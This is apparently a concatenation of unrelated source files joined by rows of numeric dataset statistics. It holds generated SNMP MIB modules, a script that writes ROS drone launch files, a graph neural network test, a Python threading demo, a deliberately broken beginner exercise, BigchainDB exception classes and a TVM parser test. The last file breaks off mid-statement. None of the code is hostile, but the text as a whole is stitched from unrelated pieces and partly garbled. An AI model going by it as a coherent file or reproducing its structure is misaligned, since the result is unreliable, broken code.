if mibBuilder.loadTexts: garpApplicationName.setStatus('mandatory')
garpApplicationFailedRegistrations = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 1, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: garpApplicationFailedRegistrations.setStatus('mandatory')
garpApplicationOperationStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 1, 1, 4), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: garpApplicationOperationStatus.setStatus('mandatory')
garpPortOperationTable = MibTable((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 2), )
if mibBuilder.loadTexts: garpPortOperationTable.setStatus('mandatory')
garpPortOperationEntry = MibTableRow((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 2, 1), ).setIndexNames((0, "GARP-MIB", "garpPortOperationAppType"), (0, "GARP-MIB", "garpPortOperationPort"))
if mibBuilder.loadTexts: garpPortOperationEntry.setStatus('mandatory')
garpPortOperationAppType = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 2, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: garpPortOperationAppType.setStatus('mandatory')
garpPortOperationPort = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 2, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: garpPortOperationPort.setStatus('mandatory')
garpPortOperationStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 2, 1, 3), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: garpPortOperationStatus.setStatus('mandatory')
garpTimerTable = MibTable((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 3), )
if mibBuilder.loadTexts: garpTimerTable.setStatus('mandatory')
garpTimerEntry = MibTableRow((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 3, 1), ).setIndexNames((0, "GARP-MIB", "garpTimerAttributeAppType"), (0, "GARP-MIB", "garpTimerAttributePort"))
if mibBuilder.loadTexts: garpTimerEntry.setStatus('mandatory')
garpTimerAttributeAppType = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 3, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: garpTimerAttributeAppType.setStatus('mandatory')
garpTimerAttributePort = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 3, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: garpTimerAttributePort.setStatus('mandatory')
garpTimerAttributeJoin = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 3, 1, 3), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: garpTimerAttributeJoin.setStatus('mandatory')
garpTimerAttributeLeave = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 3, 1, 4), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: garpTimerAttributeLeave.setStatus('mandatory')
garpTimerAttributeLeaveAll = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 3, 1, 5), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: garpTimerAttributeLeaveAll.setStatus('mandatory')
garpAttributeTable = MibTable((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 4), )
if mibBuilder.loadTexts: garpAttributeTable.setStatus('mandatory')
garpAttributeEntry = MibTableRow((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 4, 1), ).setIndexNames((0, "GARP-MIB", "garpAttributeAppType"), (0, "GARP-MIB", "garpAttributePort"), (0, "GARP-MIB", "garpAttributeValue"), (0, "GARP-MIB", "garpAttributeGIPContextID"))
if mibBuilder.loadTexts: garpAttributeEntry.setStatus('mandatory')
garpAttributeAppType = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 4, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: garpAttributeAppType.setStatus('mandatory')
garpAttributePort = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 4, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: garpAttributePort.setStatus('mandatory')
garpAttributeValue = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 4, 1, 3), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: garpAttributeValue.setStatus('mandatory')
garpAttributeGIPContextID = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 4, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: garpAttributeGIPContextID.setStatus('mandatory')
garpAttributeType = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 4, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: garpAttributeType.setStatus('mandatory')
garpAttributeProtoAdminCtrl = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 4, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("normal-Participan", 0), ("non-Participan", 1)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: garpAttributeProtoAdminCtrl.setStatus('mandatory')
garpAttributeRegisControl = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 4, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2))).clone(namedValues=NamedValues(("garpRegistrarNormal", 0), ("garpRegistrarFixed", 1), ("garpRegistrarForbidden", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: garpAttributeRegisControl.setStatus('mandatory')
garpAttributeStateValue = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 4, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23))).clone(namedValues=NamedValues(("va-mt", 0), ("va-lv", 1), ("vp-mt", 2), ("vp-lv", 3), ("vo-mt", 4), ("vo-lv", 5), ("va-in", 6), ("vp-in", 7), ("vo-in", 8), ("aa-mt", 9), ("aa-lv", 10), ("aa-in", 11), ("ap-in", 12), ("ao-in", 13), ("qa-mt", 14), ("qa-lv", 15), ("qa-in", 16), ("qp-in", 17), ("qo-in", 18), ("la-mt", 19), ("la-lv", 20), ("lo-mt", 21), ("lo-lv", 22), ("la-in", 23)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: garpAttributeStateValue.setStatus('mandatory')
garpAttributeOrigOfLastPDU = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 4, 1, 9), PhysAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: garpAttributeOrigOfLastPDU.setStatus('optional')
mibBuilder.exportSymbols("GARP-MIB", garpApplicationAppType=garpApplicationAppType, garpAttributeTable=garpAttributeTable, garpTimerTable=garpTimerTable, ctVLANMgr=ctVLANMgr, cabletron=cabletron, garpTimerEntry=garpTimerEntry, garpPortOperationTable=garpPortOperationTable, garpAttributeGIPContextID=garpAttributeGIPContextID, garpAttributeRegisControl=garpAttributeRegisControl, garpAttributeValue=garpAttributeValue, mibs=mibs, garpApplicationTable=garpApplicationTable, garpTimerAttributeJoin=garpTimerAttributeJoin, garpAttributeEntry=garpAttributeEntry, garpAttributeAppType=garpAttributeAppType, garpPortOperationAppType=garpPortOperationAppType, ctronExp=ctronExp, garpPortOperationEntry=garpPortOperationEntry, garpAttributeProtoAdminCtrl=garpAttributeProtoAdminCtrl, garpApplicationFailedRegistrations=garpApplicationFailedRegistrations, ctGarpTables=ctGarpTables, garpTimerAttributeLeaveAll=garpTimerAttributeLeaveAll, garpPortOperationStatus=garpPortOperationStatus, garpAttributePort=garpAttributePort, garpApplicationName=garpApplicationName, garpAttributeType=garpAttributeType, garpApplicationEntry=garpApplicationEntry, garpTimerAttributeLeave=garpTimerAttributeLeave, garpPortOperationPort=garpPortOperationPort, ctVLANMib=ctVLANMib, garpAttributeOrigOfLastPDU=garpAttributeOrigOfLastPDU, garpTimerAttributeAppType=garpTimerAttributeAppType, garpAttributeStateValue=garpAttributeStateValue, ctGarp=ctGarp, garpTimerAttributePort=garpTimerAttributePort, garpApplicationOperationStatus=garpApplicationOperationStatus)
| 128.575 | 1,532 | 0.740813 | 1,231 | 10,286 | 6.190089 | 0.139724 | 0.018635 | 0.014173 | 0.018898 | 0.380184 | 0.316011 | 0.275984 | 0.267323 | 0.179528 | 0.17664 | 0 | 0.084702 | 0.0944 | 10,286 | 79 | 1,533 | 130.202532 | 0.733333 | 0.030138 | 0 | 0 | 0 | 0 | 0.138557 | 0.020568 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
3e1b695fb9a66ef5adede04edcba06f1996913b4 | 3,530 | py | Python | crazyflie_demo/scripts/generateLaunch.py | xqgex/CrazyFlie_ros | a116807102506ca70ad1f2045c15ec9cc3f57b9d | [
"MIT"
] | 2 | 2018-09-13T14:36:46.000Z | 2018-11-28T09:59:15.000Z | crazyflie_demo/scripts/generateLaunch.py | xqgex/CrazyFlie_ros | a116807102506ca70ad1f2045c15ec9cc3f57b9d | [
"MIT"
] | null | null | null | crazyflie_demo/scripts/generateLaunch.py | xqgex/CrazyFlie_ros | a116807102506ca70ad1f2045c15ec9cc3f57b9d | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import logger, sys
cf_logger = logger.get_logger(__name__) # debug(), info(), warning(), error(), exception(), critical()
def droneNode(current_drone_number):
return """ <group ns="$(arg frame{num})">
<node pkg="crazyflie_driver" type="crazyflie_add" name="crazyflie_add" output="screen">
<param name="uri" value="$(arg uri{num})" />
<param name="tf_prefix" value="$(arg frame{num})" />
<param name="enable_logging" value="True" />
<param name="enable_logging_imu" value="False" />
<param name="enable_logging_temperature" value="False" />
<param name="enable_logging_magnetic_field" value="False" />
<param name="enable_logging_pressure" value="False" />
<param name="enable_logging_battery" value="True" />
<param name="enable_logging_packets" value="False" />
<rosparam>
genericLogTopics: ["log1"]
genericLogTopicFrequencies: [100]
genericLogTopic_log1_Variables: ["stateEstimate.x", "stateEstimate.y", "stateEstimate.z"]
</rosparam>
</node>
<node name="pose" pkg="crazyflie_demo" type="publishPosition.py" args="$(arg frame{num})" output="screen">
<param name="topic" value="/$(arg frame{num})/vrpn_client_node/$(arg frame{num})/pose" />
</node>
<node pkg="vrpn_client_ros" type="vrpn_client_node" name="vrpn_client_node" output="screen">
<rosparam subst_value="true">
server: $(arg ip)
port: $(arg port)
update_frequency: 100.0
frame_id: /world
child_frame_id: $(arg frame{num})
use_server_time: false
broadcast_tf: true
refresh_tracker_frequency: 0.0
trackers:
- $(arg frame{num})
</rosparam>
</node>
</group>""".format(num=current_drone_number)
def ledNode(current_led_name):
return """ <node pkg="vrpn_client_ros" type="vrpn_client_node" name="vrpn_client_node_{led}" output="screen">
<rosparam subst_value="true">
server: $(arg ip)
port: $(arg port)
update_frequency: 100.0
frame_id: /world
child_frame_id: {led}
use_server_time: false
broadcast_tf: true
refresh_tracker_frequency: 0.0
trackers:
- {led}
</rosparam>
</node>""".format(led=current_led_name)
def fileStracture(ip, port, drones, leds):
drone_args = []
for drone_number in range(len(drones)):
drone_args.append(""" <arg name="uri{num}" default="radio://0/80/2M/E7E7E7E70{mac}" />
<arg name="frame{num}" default=\"{name}" />""".format(num=drone_number, mac=drones[drone_number][-1], name=drones[drone_number]))
drone_args = "\n".join(drone_args)
drones_text = [droneNode(drone_number) for drone_number in range(len(drones))]
drones_text = "\n".join(drones_text)
leds_text = [ledNode(led_name) for led_name in leds]
leds_text = "\n".join(leds_text)
return """<?xml version="1.0"?>
<launch>
{drone_args}
<arg name="ip" default="{ip}" />
<arg name="port" default="{port}" />
<include file="$(find crazyflie_driver)/launch/crazyflie_server.launch"></include>
{drones_text}
{leds_text}
</launch>
""".format(ip=ip, port=port, drone_args=drone_args, drones_text=drones_text, leds_text=leds_text)
def generate(file_name, ip, port, drones, leds):
try:
with open(file_name, "w") as outfile:
outfile.write(fileStracture(ip, port, drones, leds))
return True
except Exception as e:
cf_logger.exception("Failed to create {}".format(file_name))
return False
if __name__ == "__main__":
print "This is not the way to do it..."
| 38.369565 | 131 | 0.670538 | 471 | 3,530 | 4.789809 | 0.29724 | 0.039894 | 0.034131 | 0.068262 | 0.332447 | 0.306738 | 0.222518 | 0.195922 | 0.195922 | 0.195922 | 0 | 0.010159 | 0.163456 | 3,530 | 91 | 132 | 38.791209 | 0.75381 | 0.029178 | 0 | 0.289157 | 0 | 0.036145 | 0.690622 | 0.185218 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.012048 | null | null | 0.012048 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
3e1ce864a0f64b7fa10c0bf34876f18f9314b893 | 1,519 | py | Python | NexGCN/Test.py | abhilash1910/NexGCN | ceb50a2e8426f89cd6f88c49f54507e7e06f8c48 | [
"MIT"
] | 1 | 2020-09-14T10:21:53.000Z | 2020-09-14T10:21:53.000Z | NexGCN/Test.py | abhilash1910/NexGCN | ceb50a2e8426f89cd6f88c49f54507e7e06f8c48 | [
"MIT"
] | 1 | 2020-09-28T09:49:08.000Z | 2020-09-28T09:49:08.000Z | NexGCN/Test.py | abhilash1910/NexGCN | ceb50a2e8426f89cd6f88c49f54507e7e06f8c48 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sat Sep 12 01:38:00 2020
@author: 45063883
"""
import networkx as nx
from networkx import karate_club_graph, to_numpy_matrix
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras.layers import Dense, Flatten,Embedding,Dropout
from keras.models import Sequential, Model
from keras import initializers, regularizers,activations,constraints
import keras.backend as k
from tensorflow.keras.layers import Layer,Input
from keras.optimizers import Adam
import numpy as np
from networkx import to_numpy_matrix, degree_centrality, betweenness_centrality, shortest_path_length,in_degree_centrality,out_degree_centrality,eigenvector_centrality,katz_centrality,closeness_centrality
import matplotlib.pyplot as plt
import NexGCN as venom
Gr = nx.gnm_random_graph(70,140)
exp=venom.ExperimentalGCN()
kernel=venom.feature_kernels()
#X=kernel.centrality_kernel(katz_centrality,Gr)
X=kernel.feature_random_weight_kernel(34,Gr)
#X=kernel.feature_distributions(np.random.poisson(4,9),Gr)
exp.create_network(Gr,X,True)
# Xs=np.matrix([
# [np.random.randn(),np.random.randn(),np.random.randn()]
# for j in range(exp.network.A.shape[0])
# ])
#
# exp.create_network(None,Xs,True)
#
predictions=exp.extract_binary_features(2048,2,keras.activations.sigmoid,'adam',5,20,1)
print(predictions)
exp.draw_graph(predictions,exp.network.F.shape[-1],300,True,90,90,'#00FFFF','#FF00FF')
output_class=exp.get_outcome(37)
print(output_class)
| 33.755556 | 204 | 0.782752 | 224 | 1,519 | 5.15625 | 0.508929 | 0.027706 | 0.033766 | 0.04329 | 0.087446 | 0.033766 | 0 | 0 | 0 | 0 | 0 | 0.039764 | 0.105991 | 1,519 | 44 | 205 | 34.522727 | 0.810751 | 0.245556 | 0 | 0 | 0 | 0 | 0.015957 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.583333 | 0 | 0.583333 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
3e1e15d7d290ad4d56b7bdb918e5a454e11409e8 | 253 | py | Python | deepbiome/__init__.py | Young-won/deepbiome | 644bc226f1149038d0af7203a03a77ca6e931835 | [
"BSD-3-Clause"
] | 4 | 2019-10-20T15:56:19.000Z | 2021-03-17T16:48:35.000Z | deepbiome/__init__.py | Young-won/deepbiome | 644bc226f1149038d0af7203a03a77ca6e931835 | [
"BSD-3-Clause"
] | 1 | 2019-11-11T22:47:57.000Z | 2019-11-11T22:47:57.000Z | deepbiome/__init__.py | Young-won/deepbiome | 644bc226f1149038d0af7203a03a77ca6e931835 | [
"BSD-3-Clause"
] | 1 | 2019-11-11T18:17:58.000Z | 2019-11-11T18:17:58.000Z | # -*- coding: utf-8 -*-
"""Top-level package for deepmicrobiome."""
__author__ = """Youngwon Choi"""
__email__ = 'youngwon08@gmail.com'
__version__ = '1.0.0'
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
| 21.083333 | 43 | 0.711462 | 31 | 253 | 5.16129 | 0.741935 | 0.20625 | 0.225 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027027 | 0.12253 | 253 | 11 | 44 | 23 | 0.693694 | 0.237154 | 0 | 0 | 0 | 0 | 0.240642 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
3e2ba038c29840e9df03e7839cb0602b9784b313 | 773 | py | Python | ITcoach/len_more_program/more_program.py | ww35133634/chenxusheng | 666e0eb3aedde46342faf0d4030f5c72b10c9732 | [
"AFL-3.0"
] | null | null | null | ITcoach/len_more_program/more_program.py | ww35133634/chenxusheng | 666e0eb3aedde46342faf0d4030f5c72b10c9732 | [
"AFL-3.0"
] | null | null | null | ITcoach/len_more_program/more_program.py | ww35133634/chenxusheng | 666e0eb3aedde46342faf0d4030f5c72b10c9732 | [
"AFL-3.0"
] | null | null | null | # import threading
#
# num = 1
#
#
# def demo1():
# global num # 把num提升为全局变量
# num += 1
# print("demo1的num是%s" % num)
#
#
# def demo2():
# print("demo2的num是%s" % num)
#
#
# def main():
# t1 = threading.Thread(target=demo1)
# t2 = threading.Thread(target=demo2)
# t1.start()
# t2.start()
#
#
# if __name__ == "__main__":
# main()
import threading
list1 = [1,2,3,4]
def demo1(i):
# global list1 #因为是list1 是列表元素可以变的,可以不用global
list1.append(i)
print("demo1的list1是%s" % list1)
def demo2():
print("demo2的list1是%s" % list1)
def main():
t1 = threading.Thread(target=demo1,args=(5,)) #args是传入实参,参数为元组
t2 = threading.Thread(target=demo2)
t1.start()
t2.start()
if __name__ == "__main__":
main()
| 15.156863 | 68 | 0.583441 | 93 | 773 | 4.677419 | 0.387097 | 0.137931 | 0.193103 | 0.082759 | 0.418391 | 0.418391 | 0.418391 | 0.257471 | 0.257471 | 0.257471 | 0 | 0.059727 | 0.241915 | 773 | 50 | 69 | 15.46 | 0.682594 | 0.48771 | 0 | 0 | 0 | 0 | 0.098093 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.071429 | 0 | 0.285714 | 0.142857 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
3e2d690f43c8e5be85e9974b9a4e94736675770f | 329 | py | Python | src/rectangle_perimeter.py | Athenian-Computer-Science/variables-intro-practice-template | 19a4ec0f164eb019dbbc6bc5135157509991db41 | [
"Apache-2.0"
] | null | null | null | src/rectangle_perimeter.py | Athenian-Computer-Science/variables-intro-practice-template | 19a4ec0f164eb019dbbc6bc5135157509991db41 | [
"Apache-2.0"
] | null | null | null | src/rectangle_perimeter.py | Athenian-Computer-Science/variables-intro-practice-template | 19a4ec0f164eb019dbbc6bc5135157509991db41 | [
"Apache-2.0"
] | null | null | null | #############################
# Collaborators: (enter people or resources who/that helped you)
# If none, write none
#
#
#############################
# Fix the program below:
base = input(Enter the base: )
input(Enter the height: ) = height
perimeter = base + height * 2
print("The perimeter of the rectangle is {perimeter}.") | 25.307692 | 64 | 0.583587 | 39 | 329 | 4.923077 | 0.641026 | 0.09375 | 0.145833 | 0.177083 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003584 | 0.151976 | 329 | 13 | 65 | 25.307692 | 0.684588 | 0.319149 | 0 | 0 | 0 | 0 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
3e54192ca38bd453d7a17e53fe87c4825f2f46bf | 339 | py | Python | bigchaindb/exceptions.py | AbhishaB/bigchaindb | edcd59e235776755e08219ba7e72fc110ba7b001 | [
"Apache-2.0"
] | 474 | 2020-02-05T06:22:58.000Z | 2022-03-29T00:02:10.000Z | packages/p2lara/src/storages/bigchaindb/exceptions.py | Imranashraf101/Decentralized-Internet | 5c3b0e30fcc0f78f5434fdfdc1d0557fb8cf91ca | [
"MIT"
] | 1,823 | 2019-12-18T19:36:48.000Z | 2022-03-31T20:24:51.000Z | packages/p2lara/src/storages/bigchaindb/exceptions.py | Imranashraf101/Decentralized-Internet | 5c3b0e30fcc0f78f5434fdfdc1d0557fb8cf91ca | [
"MIT"
] | 174 | 2019-12-18T19:33:23.000Z | 2022-03-24T12:40:56.000Z | # Copyright BigchainDB GmbH and BigchainDB contributors
# SPDX-License-Identifier: (Apache-2.0 AND CC-BY-4.0)
# Code is Apache-2.0 and docs are CC-BY-4.0
class BigchainDBError(Exception):
"""Base class for BigchainDB exceptions."""
class CriticalDoubleSpend(BigchainDBError):
"""Data integrity error that requires attention"""
| 28.25 | 55 | 0.752212 | 46 | 339 | 5.543478 | 0.673913 | 0.054902 | 0.062745 | 0.086275 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027397 | 0.138643 | 339 | 11 | 56 | 30.818182 | 0.84589 | 0.681416 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
3e6d4e8d9f992a192ea75508605db92930cbd603 | 883 | py | Python | buggyFile/8.py | anonymousWork000/TVMfuzz | 0ccbb33af89758b8ead59a8c686645246ccd0545 | [
"Apache-2.0"
] | 16 | 2021-05-22T07:39:53.000Z | 2022-02-23T14:50:38.000Z | buggyFile/8.py | anonymousWork000/TVMfuzz | 0ccbb33af89758b8ead59a8c686645246ccd0545 | [
"Apache-2.0"
] | null | null | null | buggyFile/8.py | anonymousWork000/TVMfuzz | 0ccbb33af89758b8ead59a8c686645246ccd0545 | [
"Apache-2.0"
] | 3 | 2021-05-28T07:12:14.000Z | 2021-11-28T02:10:48.000Z |
import tvm.topi.testing
import tvm.relay.transform
import tvm.relay.testing
import tvm
import tvm.relay as relay
import pytest
import tvm.testing
from tvm.tir.expr import *
from tvm.relay.dataflow_pattern import *
warning=pytest.raises(tvm.error.DiagnosticError)
def assert_graph_equal(lhs, rhs):
tvm.ir.assert_structural_equal(lhs, rhs, map_free_vars=True)
def graph_equal(lhs, rhs):
return tvm.ir.structural_equal(lhs, rhs, map_free_vars=True)
def roundtrip_expr(expr):
text = tvm.relay.Expr.astext(expr, show_meta_data=False)
x = tvm.parser.parse_expr(text)
assert_graph_equal(x, expr)
def roundtrip(expr):
x = tvm.parser.fromtext(expr.astext())
assert_graph_equal(x, expr)
def parse_text(code):
expr = tvm.parser.parse_expr(code)
roundtrip_expr(expr)
return expr
with warning:
res=parse_text('''meta[random_entry][15123]''')
| 21.536585 | 64 | 0.750849 | 137 | 883 | 4.664234 | 0.343066 | 0.084507 | 0.068858 | 0.050078 | 0.197183 | 0.197183 | 0.122066 | 0.122066 | 0.122066 | 0 | 0 | 0.006562 | 0.137033 | 883 | 40 | 65 | 22.075 | 0.832021 | 0 | 0 | 0.074074 | 0 | 0 | 0.028377 | 0.028377 | 0 | 0 | 0 | 0 | 0.148148 | 1 | 0.185185 | false | 0 | 0.333333 | 0.037037 | 0.592593 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
3e6f2d3f752221ea070d3684a0dcc749e3111a9b | 2,564 | py | Python | pysnmp/CISCO-BITS-CLOCK-CAPABILITY.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/CISCO-BITS-CLOCK-CAPABILITY.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/CISCO-BITS-CLOCK-CAPABILITY.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module CISCO-BITS-CLOCK-CAPABILITY (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-BITS-CLOCK-CAPABILITY
# Produced by pysmi-0.3.4 at Mon Apr 29 17:34:01 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsUnion, ValueRangeConstraint, ConstraintsIntersection, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsUnion", "ValueRangeConstraint", "ConstraintsIntersection", "ValueSizeConstraint")
ciscoAgentCapability, = mibBuilder.importSymbols("CISCO-SMI", "ciscoAgentCapability")
NotificationGroup, AgentCapabilities, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "AgentCapabilities", "ModuleCompliance")
MibScalar, MibTable, MibTableRow, MibTableColumn, Integer32, Gauge32, NotificationType, Bits, ObjectIdentity, ModuleIdentity, MibIdentifier, Unsigned32, TimeTicks, Counter64, IpAddress, iso, Counter32 = mibBuilder.importSymbols("SNMPv2-SMI", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Integer32", "Gauge32", "NotificationType", "Bits", "ObjectIdentity", "ModuleIdentity", "MibIdentifier", "Unsigned32", "TimeTicks", "Counter64", "IpAddress", "iso", "Counter32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
ciscoBitsClockCapability = ModuleIdentity((1, 3, 6, 1, 4, 1, 9, 7, 433))
ciscoBitsClockCapability.setRevisions(('2005-03-08 00:00',))
if mibBuilder.loadTexts: ciscoBitsClockCapability.setLastUpdated('200503080000Z')
if mibBuilder.loadTexts: ciscoBitsClockCapability.setOrganization('Cisco Systems, Inc.')
ciscoBitsClockV12R025000SW1 = AgentCapabilities((1, 3, 6, 1, 4, 1, 9, 7, 433, 1))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoBitsClockV12R025000SW1 = ciscoBitsClockV12R025000SW1.setProductRelease('Cisco IOS 12.2(25)SW1')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
